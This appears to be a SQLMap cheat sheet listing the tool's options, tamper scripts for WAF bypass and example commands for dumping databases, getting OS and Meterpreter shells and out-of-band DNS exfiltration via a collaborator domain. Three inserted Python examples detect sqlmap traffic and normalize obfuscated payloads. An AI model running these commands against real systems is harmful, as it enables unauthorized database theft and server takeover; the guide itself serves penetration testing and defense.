What is SQLMap?

SQLMap is a SQL injection automation tool that finds and exploits SQL injection vulnerabilities. SQLMap offers a wide range of functionality, from fingerprinting the backend to fully compromising a database and, in some cases, gaining shell-level access to the server. If you do not have a current understanding of the fundamentals of how a SQL injection vulnerability occurs or is exploited, see our documentation on what is SQL injection for an overview.

TIP: How To Use SQLMap

I personally use SQLMap as an exploitation tool; due to the large amount of resources and traffic the tool uses, I personally find that detection is better done manually or using other detection tools such as the Burp Suite scanner.

How to use SQLMap

SQLMap can be used within an automation system to detect and exploit SQL injection (SQLi) vulnerabilities in web applications, or as a SQLi exploitation tool once a proof-of-concept SQLi payload has been confirmed.

WARNING: SQLMap Usage

Depending on the configuration, SQLMap can be very heavy on the requests it sends to a web application; it may cause DoS conditions for web servers and generate an excessive volume of log entries on the target.

The more information you can give SQLMap, the faster it runs and the fewer requests it makes. For example, if you know the backend DBMS is MySQL and that it is vulnerable to time-based injection, this can be provided to SQLMap using --dbms=mysql and --technique=T.
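The request volume described in the warning above is also what makes a SQLMap run visible to the target. The following is an added example, not part of the original cheat sheet and not sqlmap code: a small Python check over constructed access-log lines that flags two signals, the tool's default User-Agent (which begins with "sqlmap/" unless -A or --random-agent overrides it) and bursts of requests from one client against one path, which a spoofed User-Agent does not hide. The log lines, IP addresses and thresholds are constructed for the example.

```python
"""Added example: flag sqlmap-style scanning in Combined Log Format access logs."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined Log Format (Apache/nginx default); the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one ordinary visitor, one client using sqlmap's default
# User-Agent (it starts with "sqlmap/"), and one client hiding behind a browser
# User-Agent (as --random-agent or -A would) that still produces a burst.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2024:10:00:01 +0000] "GET /?espresso=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [12/Feb/2024:10:00:02 +0000] "GET /?espresso=1 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Feb/2024:10:00:02 +0000] "GET /?espresso=1%27 HTTP/1.1" 500 118 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Feb/2024:10:00:03 +0000] "GET /?espresso=1%22 HTTP/1.1" 500 118 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Feb/2024:10:00:03 +0000] "GET /?espresso=1%29 HTTP/1.1" 500 118 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Feb/2024:10:00:04 +0000] "GET /?espresso=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Feb/2024:10:00:05 +0000] "GET /?espresso=1%20AND%201%3D2 HTTP/1.1" 200 497 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
192.0.2.77 - - [12/Feb/2024:10:01:10 +0000] "POST /login HTTP/1.1" 200 820 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.77 - - [12/Feb/2024:10:01:10 +0000] "POST /login HTTP/1.1" 200 820 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.77 - - [12/Feb/2024:10:01:11 +0000] "POST /login HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.77 - - [12/Feb/2024:10:01:11 +0000] "POST /login HTTP/1.1" 200 820 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.77 - - [12/Feb/2024:10:01:12 +0000] "POST /login HTTP/1.1" 200 820 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["target"].split("?", 1)[0]  # drop the query string
    return rec


def flag_user_agent(records):
    """Client IPs that sent sqlmap's default User-Agent (trivially spoofable, but cheap)."""
    return {r["ip"] for r in records if r["ua"].lower().startswith("sqlmap/")}


def flag_bursts(records, window_s=10, threshold=5):
    """{(ip, path): peak_count} for clients exceeding `threshold` hits on one path
    inside a sliding window of `window_s` seconds (thresholds are illustrative)."""
    bursts = {}
    recent = defaultdict(deque)
    for r in sorted(records, key=lambda rec: rec["ts"]):
        key = (r["ip"], r["path"])
        q = recent[key]
        q.append(r["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            bursts[key] = max(bursts.get(key, 0), len(q))
    return bursts


def analyse(log_text):
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    return {"ua_hits": flag_user_agent(records), "bursts": flag_bursts(records)}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    print("default sqlmap User-Agent seen from:", sorted(result["ua_hits"]))
    for (ip, path), peak in sorted(result["bursts"].items()):
        print(f"burst: {ip} -> {path} ({peak} requests within window)")
```

The User-Agent rule catches only careless runs; the burst rule is what the --random-agent client in the sample still trips, and the --delay / --threads options listed further down are exactly the knobs that change how noisy a run looks against such a threshold.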

How to Install SQLMap

Install SQLMap from GitHub:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

How to Update SQLMap

How to update SQLMap:

python sqlmap.py --update 

or cd into the cloned GitHub repository directory and run:

git pull 

SQLMap Commands

SQLMap Options

Basic SQLMap command options:

COMMAND    DESCRIPTION
-h, --help    Show basic help message and exit
-hh    Show advanced help message and exit
--version    Show program's version number and exit
-v VERBOSE    Verbosity level: 0-6 (default 1)

SQLMap Target

SQLMap target command options:

COMMAND    DESCRIPTION
-u URL, --url=URL    Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-d DIRECT    Connection string for direct database connection
-l LOGFILE    Parse target(s) from Burp or WebScarab proxy log file
-m BULKFILE    Scan multiple targets given in a textual file
-r REQUESTFILE    Load HTTP request from a file
-g GOOGLEDORK    Process Google dork results as target URLs
-c CONFIGFILE    Load options from a configuration INI file

SQLMap Requests

SQLMap request command options:

COMMAND    DESCRIPTION
-A AGENT, --user..    HTTP User-Agent header value
-H HEADER, --hea..    Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--method=METHOD    Force usage of given HTTP method (e.g. PUT)
--data=DATA    Data string to be sent through POST (e.g. "id=1")
--param-del=PARA..    Character used for splitting parameter values (e.g. &)
--cookie=COOKIE    HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--cookie-del=COO..    Character used for splitting cookie values (e.g. ;)
--live-cookies=L..    Live cookies file used for loading up-to-date values
--load-cookies=L..    File containing cookies in Netscape/wget format
--drop-set-cookie    Ignore Set-Cookie header from response
--mobile    Imitate smartphone through HTTP User-Agent header
--random-agent    Use randomly selected HTTP User-Agent header value
--host=HOST    HTTP Host header value
--referer=REFERER    HTTP Referer header value
--headers=HEADERS    Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--auth-type=AUTH..    HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred=AUTH..    HTTP authentication credentials (name:password)
--auth-file=AUTH..    HTTP authentication PEM cert/private key file
--ignore-code=IG..    Ignore (problematic) HTTP error code (e.g. 401)
--ignore-proxy    Ignore system default proxy settings
--ignore-redirects    Ignore redirection attempts
--ignore-timeouts    Ignore connection timeouts
--proxy=PROXY    Use a proxy to connect to the target URL
--proxy-cred=PRO..    Proxy authentication credentials (name:password)
--proxy-file=PRO..    Load proxy list from a file
--proxy-freq=PRO..    Requests between change of proxy from a given list
--tor    Use Tor anonymity network
--tor-port=TORPORT    Set Tor proxy port other than default
--tor-type=TORTYPE    Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
--check-tor    Check to see if Tor is used properly
--delay=DELAY    Delay in seconds between each HTTP request
--timeout=TIMEOUT    Seconds to wait before timeout connection (default 30)
--retries=RETRIES    Retries when the connection times out (default 3)
--randomize=RPARAM    Randomly change value for given parameter(s)
--safe-url=SAFEURL    URL address to visit frequently during testing
--safe-post=SAFE..    POST data to send to a safe URL
--safe-req=SAFER..    Load safe HTTP request from a file
--safe-freq=SAFE..    Regular requests between visits to a safe URL
--skip-urlencode    Skip URL encoding of payload data
--csrf-token=CSR..    Parameter used to hold anti-CSRF token
--csrf-url=CSRFURL    URL address to visit for extraction of anti-CSRF token
--csrf-method=CS..    HTTP method to use during anti-CSRF token page visit
--csrf-retries=C..    Retries for anti-CSRF token retrieval (default 0)
--force-ssl    Force usage of SSL/HTTPS
--chunked    Use HTTP chunked transfer encoded (POST) requests
--hpp    Use HTTP parameter pollution method
--eval=EVALCODE    Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")

SQLMap Optimisation

SQLMap optimisation command options:

COMMAND    DESCRIPTION
-o    Turn on all optimization switches
--predict-output    Predict common queries output
--keep-alive    Use persistent HTTP(s) connections
--null-connection    Retrieve page length without actual HTTP response body
--threads=THREADS    Max number of concurrent HTTP(s) requests (default 1)

SQLMap Injection

SQLMap injection command options:

COMMAND    DESCRIPTION
-p TESTPARAMETER    Testable parameter(s)
--skip=SKIP    Skip testing for given parameter(s)
--skip-static    Skip testing parameters that do not appear to be dynamic
--param-exclude=..    Regexp to exclude parameters from testing (e.g. "ses")
--param-filter=P..    Select testable parameter(s) by place (e.g. "POST")
--dbms=DBMS    Force back-end DBMS to provided value
--dbms-cred=DBMS..    DBMS authentication credentials (user:password)
--os=OS    Force back-end DBMS operating system to provided value
--invalid-bignum    Use big numbers for invalidating values
--invalid-logical    Use logical operations for invalidating values
--invalid-string    Use random strings for invalidating values
--no-cast    Turn off payload casting mechanism
--no-escape    Turn off string escaping mechanism
--prefix=PREFIX    Injection payload prefix string
--suffix=SUFFIX    Injection payload suffix string
--tamper=TAMPER    Use given script(s) for tampering injection data

SQLMap Detection

SQLMap detection command options:

COMMAND    DESCRIPTION
--level=LEVEL    Level of tests to perform (1-5, default 1)
--risk=RISK    Risk of tests to perform (1-3, default 1)
--string=STRING    String to match when query is evaluated to True
--not-string=NOT..    String to match when query is evaluated to False
--regexp=REGEXP    Regexp to match when query is evaluated to True
--code=CODE    HTTP code to match when query is evaluated to True
--smart    Perform thorough tests only if positive heuristic(s)
--text-only    Compare pages based only on the textual content
--titles    Compare pages based only on their titles

SQLMap Techniques

SQLMap technique command options:

COMMAND    DESCRIPTION
--technique=TECH..    SQL injection techniques to use (default "BEUSTQ")
--time-sec=TIMESEC    Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS    Range of columns to test for UNION query SQL injection
--union-char=UCHAR    Character to use for bruteforcing number of columns
--union-from=UFROM    Table to use in FROM part of UNION query SQL injection
--dns-domain=DNS..    Domain name used for DNS exfiltration attack
--second-url=SEC..    Resulting page URL searched for second-order response
--second-req=SEC..    Load second-order HTTP request from file

SQLMap Fingerprinting

SQLMap fingerprint command options:

COMMAND    DESCRIPTION
-f, --fingerprint    Perform an extensive DBMS version fingerprint

SQLMap Enumeration

SQLMap enumeration command options:

COMMAND    DESCRIPTION
-a, --all    Retrieve everything
-b, --banner    Retrieve DBMS banner
--current-user    Retrieve DBMS current user
--current-db    Retrieve DBMS current database
--hostname    Retrieve DBMS server hostname
--is-dba    Detect if the DBMS current user is DBA
--users    Enumerate DBMS users
--passwords    Enumerate DBMS users password hashes
--privileges    Enumerate DBMS users privileges
--roles    Enumerate DBMS users roles
--dbs    Enumerate DBMS databases
--tables    Enumerate DBMS database tables
--columns    Enumerate DBMS database table columns
--schema    Enumerate DBMS schema
--count    Retrieve number of entries for table(s)
--dump    Dump DBMS database table entries
--dump-all    Dump all DBMS databases tables entries
--search    Search column(s), table(s) and/or database name(s)
--comments    Check for DBMS comments during enumeration
--statements    Retrieve SQL statements being run on DBMS
-D DB    DBMS database to enumerate
-T TBL    DBMS database table(s) to enumerate
-C COL    DBMS database table column(s) to enumerate
-X EXCLUDE    DBMS database identifier(s) to not enumerate
-U USER    DBMS user to enumerate
--exclude-sysdbs    Exclude DBMS system databases when enumerating tables
--pivot-column=P..    Pivot column name
--where=DUMPWHERE    Use WHERE condition while table dumping
--start=LIMITSTART    First dump table entry to retrieve
--stop=LIMITSTOP    Last dump table entry to retrieve
--first=FIRSTCHAR    First query output word character to retrieve
--last=LASTCHAR    Last query output word character to retrieve
--sql-query=SQLQ..    SQL statement to be executed
--sql-shell    Prompt for an interactive SQL shell
--sql-file=SQLFILE    Execute SQL statements from given file(s)

SQLMap Brute Force

SQLMap brute force command options:

COMMAND    DESCRIPTION
--common-tables    Check existence of common tables
--common-columns    Check existence of common columns
--common-files    Check existence of common files

SQLMap Custom User Defined Options

SQLMap custom command options:

COMMAND    DESCRIPTION
--udf-inject    Inject custom user-defined functions
--shared-lib=SHLIB    Local path of the shared library

SQLMap File System Options

SQLMap file system command options, e.g., how to read a file from the command line using SQLMap:

COMMAND    DESCRIPTION
--file-read=FILE..    Read a file from the back-end DBMS file system
--file-write=FILE..    Write a local file on the back-end DBMS file system
--file-dest=FILE..    Back-end DBMS absolute filepath to write to

SQLMap Operating System Access

SQLMap OS command options, e.g., how to gain a shell via SQLMap:

COMMAND    DESCRIPTION
--os-cmd=OSCMD    Execute an operating system command
--os-shell    Prompt for an interactive operating system shell
--os-pwn    Prompt for an OOB shell, Meterpreter or VNC
--os-smbrelay    One click prompt for an OOB shell, Meterpreter or VNC
--os-bof    Stored procedure buffer overflow exploitation
--priv-esc    Database process user privilege escalation
--msf-path=MSFPATH    Local path where Metasploit Framework is installed
--tmp-path=TMPPATH    Remote absolute path of temporary files directory

SQLMap Windows Registry Access

COMMAND    DESCRIPTION
--reg-read    Read a Windows registry key value
--reg-add    Write a Windows registry key value data
--reg-del    Delete a Windows registry key value
--reg-key=REGKEY    Windows registry key
--reg-value=REGVAL    Windows registry key value
--reg-data=REGDATA    Windows registry key value data
--reg-type=REGTYPE    Windows registry key value type

General SQLMap Commands

SQLMap general command options:

COMMAND    DESCRIPTION
-s SESSIONFILE    Load session from a stored (.sqlite) file
-t TRAFFICFILE    Log all HTTP traffic into a textual file
--answers=ANSWERS    Set predefined answers (e.g. "quit=N,follow=N")
--base64=BASE64PARAMS    Parameter(s) containing Base64 encoded data
--base64-safe    Use URL and filename safe Base64 alphabet (RFC 4648)
--batch    Never ask for user input, use the default behavior
--binary-fields=BINARYFIELDS    Result fields having binary values (e.g. "digest")
--check-internet    Check Internet connection before assessing the target
--cleanup    Clean up the DBMS from sqlmap specific UDF and tables
--crawl=CRAWLDEPTH    Crawl the website starting from the target URL
--crawl-exclude=CRAWLEXCLUDE    Regexp to exclude pages from crawling (e.g. "logout")
--csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
--charset=CHARSET    Blind SQL injection charset (e.g. "0123456789abcdef")
--dump-format=DUMPFORMAT    Format of dumped data (CSV (default), HTML or SQLITE)
--encoding=ENCODING    Character encoding used for data retrieval (e.g. GBK)
--eta    Display for each output the estimated time of arrival
--flush-session    Flush session files for current target
--forms    Parse and test forms on target URL
--fresh-queries    Ignore query results stored in session file
--gpage=GOOGLEPAGE    Use Google dork results from specified page number
--har=HARFILE    Log all HTTP traffic into a HAR file
--hex    Use hex conversion during data retrieval
--output-dir=OUTPUTDIR    Custom output directory path
--parse-errors    Parse and display DBMS error messages from responses
--preprocess=PREPROCESS    Use given script(s) for preprocessing (request)
--postprocess=POSTPROCESS    Use given script(s) for postprocessing (response)
--repair    Redump entries having unknown character marker (?)
--save=SAVECONFIG    Save options to a configuration INI file
--scope=SCOPE    Regexp for filtering targets
--skip-heuristics    Skip heuristic detection of SQLi/XSS vulnerabilities
--skip-waf    Skip heuristic detection of WAF/IPS protection
--table-prefix=TABLEPREFIX    Prefix used for temporary tables (default: "sqlmap")
--test-filter=TESTFILTER    Select tests by payloads and/or titles (e.g. ROW)
--test-skip=TESTSKIP    Skip tests by payloads and/or titles (e.g. BENCHMARK)
--web-root=WEBROOT    Web server document root directory (e.g. "/var/www")

Misc SQLMap Commands

SQLMap commands that don’t fit into any other category :)

COMMAND    DESCRIPTION
-z MNEMONICS    Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
--alert=ALERT    Run host OS command(s) when SQL injection is found
--beep    Beep on question and/or when SQLi/XSS/FI is found
--dependencies    Check for missing (optional) sqlmap dependencies
--disable-coloring    Disable console output coloring
--list-tampers    Display list of available tamper scripts
--offline    Work in offline mode (only use session data)
--purge    Safely remove all content from sqlmap data directory
--results-file=RESULTSFILE    Location of CSV results file in multiple targets mode
--shell    Prompt for an interactive sqlmap shell
--tmp-dir=TMPDIR    Local directory for storing temporary files
--unstable    Adjust options for unstable connections
--update    Update sqlmap
--wizard    Simple wizard interface for beginner users

SQLMap Examples: How To…

Enumerate Databases

How to enumerate the databases using SQLMap:

sqlmap -u "https://highon.coffee" --dbs 

Enumerate Tables

How to enumerate the database tables using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" --tables 

SQLMap Dump DB Table

How to dump the contents of the table using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" -T "$table-name" --dump 

SQLMap from Burp file

Save a Burp or ZAP request file and mark the injection point parameter(s) with an asterisk (*). The advantage of this option is that it takes care of any authentication cookies for you. You can inject into any parameter in the request (headers, cookie values, etc.) and with any HTTP method (GET, PUT, POST, DELETE, etc.).

sqlmap -r request.burp 

Custom SQL Injection Payload: Pre and Post Input

In a scenario where you have identified a SQL injection manually or via another tool, you may need to prefix the payload (have input placed before the SQL injection payload) or suffix it (have input placed after the injection payload). This can be accomplished with the --prefix and --suffix options:

How to insert input before an injection payload:

sqlmap -u "https://highon.coffee" --dbs --prefix="blah"

How to insert input after an injection payload:

sqlmap -u "https://highon.coffee" --dbs --suffix="--+" --cookie="PHPSESSID=$your-cookie"

SQLMap Shell

How to get an operating system command shell with SQLMap:

sqlmap -u "https://highon.coffee" --os-shell

How to execute a command with SQLMap:

sqlmap -u "https://highon.coffee" --os-cmd uname

Meterpreter shell with SQLMap:

sqlmap -u "https://highon.coffee" --os-pwn

SQLMap WAF Bypass

To bypass WAFs with SQLMap you can use the premade tamper scripts with --tamper, as in the following example:

sqlmap -u "https://highon.coffee/?espresso=*" --tamper="apostrophemask,apostrophenullencode,randomcase"

Tamper Scripts Send a LOT of Requests

Tamper scripts will resend the same request for each of the SQLMap WAF bypass scripts that you add.

List of SQLMap Tamper Scripts:

Tamper    Description
apostrophemask.py    Replaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencode.py    Replaces apostrophe character with its illegal double unicode counterpart
appendnullbyte.py    Appends encoded NULL byte character at the end of payload
base64encode.py    Base64-encodes all characters in a given payload
between.py    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
bluecoat.py    Replaces space character after SQL statement with a valid random blank character. Afterwards replaces character = with LIKE operator
chardoubleencode.py    Double url-encodes all characters in a given payload (not processing already encoded)
commalesslimit.py    Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
commalessmid.py    Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
concat2concatws.py    Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.py    Url-encodes all characters in a given payload (not processing already encoded)
charunicodeencode.py    Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)
equaltolike.py    Replaces all occurrences of operator equal ('=') with operator 'LIKE'
escapequotes.py    Slash escape quotes (' and ")
greatest.py    Replaces greater than operator ('>') with 'GREATEST' counterpart
halfversionedmorekeywords.py    Adds versioned MySQL comment before each keyword
ifnull2ifisnull.py    Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
modsecurityversioned.py    Embraces complete query with versioned comment
modsecurityzeroversioned.py    Embraces complete query with zero-versioned comment
multiplespaces.py    Adds multiple spaces around SQL keywords
nonrecursivereplacement.py    Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
percentage.py    Adds a percentage sign ('%') in front of each character
overlongutf8.py    Converts all (non-alphanumeric) characters in a given payload to overlong UTF-8 (not processing already encoded)
randomcase.py    Replaces each keyword character with random case value
randomcomments.py    Adds random comments to SQL keywords
securesphere.py    Appends special crafted string
sp_password.py    Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
space2comment.py    Replaces space character (' ') with comments
space2dash.py    Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
space2hash.py    Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2morehash.py    Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2mssqlblank.py    Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mssqlhash.py    Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
space2mysqlblank.py    Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mysqldash.py    Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
space2plus.py    Replaces space character (' ') with plus ('+')
space2randomblank.py    Replaces space character (' ') with a random blank character from a valid set of alternate characters
symboliclogical.py    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
unionalltounion.py    Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes.py    Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
uppercase.py    Replaces each keyword character with upper case value ('INSERT')
varnish.py    Appends an HTTP header 'X-originating-IP'
versionedkeywords.py    Encloses each non-function keyword with versioned MySQL comment
versionedmorekeywords.py    Encloses each keyword with versioned MySQL comment
xforwardedfor.py    Appends a fake HTTP header 'X-Forwarded-For'
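Every script in the table above rewrites the same payload into a form that a byte-for-byte WAF signature no longer matches, which is why a rule that only looks for the literal string "UNION SELECT" fails. The following is an added example, not part of the original cheat sheet and not sqlmap code, written from the detection side: it normalizes a parameter value by reversing several of the listed transformations (repeated URL decoding for charencode/chardoubleencode, the stray percent signs of percentage.py, versioned and inline comments, alternative blank characters, the full-width apostrophe of apostrophemask, random case) and only then applies a small keyword signature. The sample payloads, the benign strings and the three-pattern signature list are constructed and illustrative, not a complete ruleset.

```python
"""Added example: normalize tamper-style obfuscation before signature matching."""
import re
from urllib.parse import unquote_plus

# Deliberately small signature set; the point is normalization, not the rules.
SIGNATURES = [
    re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b"),
    re.compile(r"\bOR\s+\d+\s*=\s*\d+"),
    re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\("),
]
NAIVE = re.compile(r"UNION\s+SELECT", re.I)  # what a literal-only rule would do

# Constructed: one classic probe and several renderings of it as the listed
# tamper scripts would produce them.
SAMPLES = {
    "plain": "1' UNION SELECT NULL,NULL-- -",
    "space2comment+randomcase": "1'/**/uNiOn/**/sElEcT/**/NULL,NULL--/**/-",
    "charencode": "%31%27%20%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%4E%55%4C%4C",
    "chardoubleencode": "%2531%2527%2520%2555%254E%2549%254F%254E%2520%2553%2545"
                        "%254C%2545%2543%2554%2520%254E%2555%254C%254C",
    "versionedkeywords": "1' /*!UNION*/ /*!SELECT*/ NULL,NULL",
    "percentage": "1' %U%N%I%O%N %S%E%L%E%C%T NULL",
    "apostrophemask+space2plus": "1\uff07+UNION+SELECT+NULL",
    "randomcomments+space2hash": "1' UN/**/ION#abc\nSEL/**/ECT NULL",
}
BENIGN = ["espresso", "union station cafe", "select-a-size 2", "100% arabica"]


def url_decode_fully(s, max_rounds=5):
    """Undo charencode / chardoubleencode: decode until the string stops changing."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)  # unquote_plus also turns space2plus's '+' into ' '
        if decoded == s:
            break
        s = decoded
    return s


def normalize(payload, comment_repl=" "):
    """Collapse the obfuscations listed in the tamper table into one canonical form.

    comment_repl=" " undoes space2comment (comment stands for a space);
    comment_repl="" undoes randomcomments (comment splits a keyword)."""
    s = url_decode_fully(payload)
    s = s.replace("\uff07", "'")                          # apostrophemask
    s = s.replace("\x00", "")                              # apostrophenullencode / appendnullbyte
    s = re.sub(r"%(?![0-9A-Fa-f]{2})", "", s)              # percentage: '%' not starting an escape
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s)          # versioned / zero-versioned comments
    s = re.sub(r"/\*.*?\*/", comment_repl, s, flags=re.S)  # space2comment / randomcomments
    s = re.sub(r"(?:--|#)[^\n]*\n", " ", s)                # space2dash / space2hash line comments
    s = re.sub(r"\s+", " ", s).strip()                     # space2randomblank and friends
    return s.upper()                                       # randomcase


def naive_match(payload):
    """The literal rule alone: True only for untampered input."""
    return NAIVE.search(payload) is not None


def looks_like_sqli(payload):
    """Match the signatures against both comment interpretations of the input."""
    forms = {normalize(payload, " "), normalize(payload, "")}
    return any(sig.search(form) for form in forms for sig in SIGNATURES)


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:28s} naive={naive_match(sample)!s:5s} normalized={looks_like_sqli(sample)}")
    for text in BENIGN:
        print(f"{text!r:28s} normalized={looks_like_sqli(text)}")
```

The two comment interpretations matter: space2comment turns "UNION SELECT" into "UNION/**/SELECT" (comment means space) while randomcomments turns it into "UN/**/ION" (comment means nothing), so a normalizer has to try both. Percent stripping also eats a legitimate "100%", which is acceptable for a detection pre-filter but not for anything that modifies the request.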

SQLMap Proxy

It is possible to proxy SQLMap traffic via an upstream proxy such as Burp Suite by passing the following syntax to the tool:

sqlmap -u "https://highon.coffee" --proxy=http://127.0.0.1:8080

Burp Proxy Performance Hit

In my experience using Burp Suite as a Proxy for this process results in a considerable slow down in performance.

SQLMap Blind SQLi Out of Band (OOB)

sqlmap -u "https://highon.coffee/?espresso=*" --dns-domain=$your-collab-url

SQLMap GET Parameter

The following specifies the GET parameter "espresso" for injection:

sqlmap -u "https://highon.coffee/?espresso=*" -p espresso

SQLMap POST Parameter

The following specifies the POST parameter "espresso" for injection:

sqlmap -u "https://highon.coffee/" --data "espresso=*"

Run SQL Queries

You can run a SQL query using --sql-query, for example:

sqlmap -u "https://highon.coffee" -D $database-name --sql-query="SELECT * FROM $table;"

URL Parameters in Friendly URL’s

Simply mark them with an asterisk (*), for example:

https://highon.coffee/foo/bar/parameter1*/value1 

The above would set the injection point at parameter1.
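Because the asterisk marker is just a character in the saved request, it is worth knowing exactly where sqlmap will see one before handing the file to -r, both for the friendly-URL case above and for the Burp/ZAP request file described earlier. The following is an added example, not part of the original cheat sheet and not sqlmap's own parser: it reads a constructed raw HTTP request and reports which path segment, query parameter, header or body field carries a marker, so that an unintended asterisk (for instance inside a real cookie value) does not silently become an injection point. The request text is constructed to mirror the cheat sheet's espresso/parameter1 examples, and the path/query/header/body classification is this example's own, not sqlmap's terminology.

```python
"""Added example: locate '*' injection markers in a raw HTTP request file."""

# Constructed request: markers in a friendly-URL path segment, a query
# parameter, a header value and a form-body field, plus unmarked fields.
SAMPLE_REQUEST = (
    "POST /foo/bar/parameter1*/value1?espresso=* HTTP/1.1\r\n"
    "Host: highon.coffee\r\n"
    "Cookie: PHPSESSID=abc123\r\n"
    "X-Forwarded-For: 127.0.0.1*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "espresso=1&size=*\r\n"
)
UNMARKED_REQUEST = "GET /?espresso=1 HTTP/1.1\r\nHost: highon.coffee\r\n\r\n"


def find_injection_markers(request_text):
    """Return (method, [(location, name), ...]) for every '*' in a raw request.

    location is "path", "query", "header" or "body"; name is the path segment
    (asterisk removed), the parameter name or the header name carrying the marker.
    Raises ValueError on a request line without a method and target."""
    text = request_text.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")          # blank line separates headers from body
    lines = head.split("\n")
    request_line, header_lines = lines[0], lines[1:]
    parts = request_line.split(" ")
    if len(parts) < 2:
        raise ValueError("malformed request line: %r" % request_line)
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    findings = []
    # Friendly URLs: the marker sits inside a path segment, e.g. /parameter1*/value1
    for segment in path.split("/"):
        if "*" in segment:
            findings.append(("path", segment.replace("*", "")))
    # Query string and form body share the name=value&name=value layout
    for location, data in (("query", query), ("body", body.strip())):
        for pair in filter(None, data.split("&")):
            if "*" in pair:
                findings.append((location, pair.split("=", 1)[0]))
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep and "*" in value:
            findings.append(("header", name.strip()))
    return method, findings


if __name__ == "__main__":
    method, markers = find_injection_markers(SAMPLE_REQUEST)
    print(f"{method}: {len(markers)} marker(s)")
    for location, name in markers:
        print(f"  {location:6s} {name}")
    if not find_injection_markers(UNMARKED_REQUEST)[1]:
        print("no markers: sqlmap chooses its own parameters based on --level")
```

A request with no markers returns an empty list; in that case sqlmap falls back to selecting parameters itself, and --level decides how far beyond GET/POST parameters (into cookies and headers) that selection goes.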

SQLMap Crawl & Exploit

Useful for automation, however please be mindful of the overheads you are imposing on the target server:

python3 sqlmap.py --crawl=5 --threads=5 --risk=3 --level=5 --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N" --crawl-exclude="logout" --forms --tamper=apostrophemask,apostrophenullencode,randomcase --dns-domain=$your-collab-url --random-agent -u https://highon.coffee

You will need to replace $your-collab-url with your collaborator payload URL, and I highly recommend you set up your own collaborator server for this.


Document Changelog

  • Last Updated: 12/02/2024 (12th of February 2024)
  • Author: Arr0way
  • Notes: SQLMap cheat sheet created.